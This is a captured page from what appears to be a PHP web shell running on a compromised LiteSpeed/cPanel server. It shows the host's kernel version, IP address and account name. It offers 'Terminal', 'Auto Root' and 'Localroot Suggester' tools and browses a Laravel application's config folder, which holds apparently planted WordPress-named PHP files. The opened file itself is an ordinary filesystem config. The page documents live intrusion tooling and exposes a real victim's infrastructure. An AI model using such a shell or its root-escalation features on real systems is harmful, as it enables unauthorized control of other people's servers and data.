Linux amd.servercpanel.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
LiteSpeed
Server IP : 161.248.188.165 & Your IP : 216.73.216.219
Domains :
Cant Read [ /etc/named.conf ]
User : oishifashion
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
oishifashion /
ap.tsgbd.com /
aa /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2025-12-18 07:34
activitylog.php
1.25
KB
-rw-r--r--
2025-02-06 04:36
app.php
8.7
KB
-rw-r--r--
2025-02-06 04:36
auth.php
4.05
KB
-rw-r--r--
2025-02-06 04:36
author.php
754
B
-rw-r--r--
2025-02-06 04:36
backup.php
9.31
KB
-rw-r--r--
2025-02-06 04:36
barcode.php
57
B
-rw-r--r--
2025-02-06 04:36
broadcasting.php
2.04
KB
-rw-r--r--
2025-02-06 04:36
cache.php
3.2
KB
-rw-r--r--
2025-02-06 04:36
charts.php
481
B
-rw-r--r--
2025-02-06 04:36
constants.php
4.11
KB
-rw-r--r--
2025-02-06 04:36
cors.php
846
B
-rw-r--r--
2025-02-06 04:36
database.php
5.36
KB
-rw-r--r--
2025-02-06 04:36
datatables.php
3.43
KB
-rw-r--r--
2025-02-06 04:36
debugbar.php
7.53
KB
-rw-r--r--
2025-02-06 04:36
error_log
11.73
KB
-rw-r--r--
2025-12-19 05:52
filesystems.php
2.45
KB
-rw-r--r--
2025-02-06 04:36
hashing.php
1.54
KB
-rw-r--r--
2025-02-06 04:36
log-viewer.php
4.81
KB
-rw-r--r--
2025-02-06 04:36
logging.php
3.66
KB
-rw-r--r--
2025-02-06 04:36
mail.php
3.57
KB
-rw-r--r--
2025-02-06 04:36
menus.php
811
B
-rw-r--r--
2025-02-06 04:36
modules.php
10.4
KB
-rw-r--r--
2025-02-06 04:36
myfatoorah.php
1.47
KB
-rw-r--r--
2025-02-06 04:36
openai.php
555
B
-rw-r--r--
2025-02-06 04:36
passport.php
555
B
-rw-r--r--
2025-02-06 04:36
paypal.php
1.48
KB
-rw-r--r--
2025-02-06 04:36
paystack.php
696
B
-rw-r--r--
2025-02-06 04:36
permission.php
4.35
KB
-rw-r--r--
2025-02-06 04:36
pesapal.php
946
B
-rw-r--r--
2025-02-06 04:36
queue.php
2.84
KB
-rw-r--r--
2025-02-06 04:36
scribe.php
17.18
KB
-rw-r--r--
2025-02-06 04:36
services.php
979
B
-rw-r--r--
2025-02-06 04:36
session.php
6.86
KB
-rw-r--r--
2025-02-06 04:36
view.php
1.06
KB
-rw-r--r--
2025-02-06 04:36
wp-blog-header.php
2.74
KB
-r--r--r--
2025-12-18 07:34
wp-cron.php
2.74
KB
-rw-r--r--
2025-12-18 07:34
Save
Rename
<?php return [ /* |-------------------------------------------------------------------------- | Default Filesystem Disk |-------------------------------------------------------------------------- | | Here you may specify the default filesystem disk that should be used | by the framework. The "local" disk, as well as a variety of cloud | based disks are available to your application. Just store away! | */ 'default' => env('FILESYSTEM_DISK', 'local'), /* |-------------------------------------------------------------------------- | Filesystem Disks |-------------------------------------------------------------------------- | | Here you may configure as many filesystem "disks" as you wish, and you | may even configure multiple disks of the same driver. Defaults have | been set up for each driver as an example of the required values. | | Supported Drivers: "local", "ftp", "sftp", "s3" | */ 'disks' => [ 'local' => [ 'driver' => 'local', 'root' => public_path('uploads'), 'throw' => false, ], 'public' => [ 'driver' => 'local', 'root' => storage_path('app/public'), 'url' => env('APP_URL').'/storage', 'visibility' => 'public', 'throw' => false, ], 's3' => [ 'driver' => 's3', 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION'), 'bucket' => env('AWS_BUCKET'), 'url' => env('AWS_URL'), 'endpoint' => env('AWS_ENDPOINT'), 'use_path_style_endpoint' => env('AWS_USE_PATH_STYLE_ENDPOINT', false), 'throw' => false, ], 'dropbox' => [ 'driver' => 'dropbox', 'authorization_token' => env('DROPBOX_ACCESS_TOKEN'), ], ], /* |-------------------------------------------------------------------------- | Symbolic Links |-------------------------------------------------------------------------- | | Here you may configure the symbolic links that will be created when the | `storage:link` Artisan command is executed. The array keys should be | the locations of the links and the values should be their targets. | */ 'links' => [ public_path('storage') => storage_path('app/public'), ], ];